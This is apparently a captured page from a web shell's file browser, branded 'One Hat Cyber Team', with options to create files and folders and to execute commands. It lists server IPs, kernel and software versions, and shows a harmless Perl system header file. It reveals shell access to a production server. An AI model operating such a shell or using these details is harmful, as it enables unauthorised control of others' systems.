One Hat Cyber Team
Your IP :
52.14.45.216
Server IP :
104.21.96.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
x86_64-linux-gnu
/
perl
/
5.34.0
/
bits
/
View File Name :
endianness.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&_BITS_ENDIANNESS_H)) { eval 'sub _BITS_ENDIANNESS_H () {1;}' unless defined(&_BITS_ENDIANNESS_H); unless(defined(&_BITS_ENDIAN_H)) { die("Never use <bits/endianness.h> directly; include <endian.h> instead."); } eval 'sub __BYTE_ORDER () { &__LITTLE_ENDIAN;}' unless defined(&__BYTE_ORDER); } 1;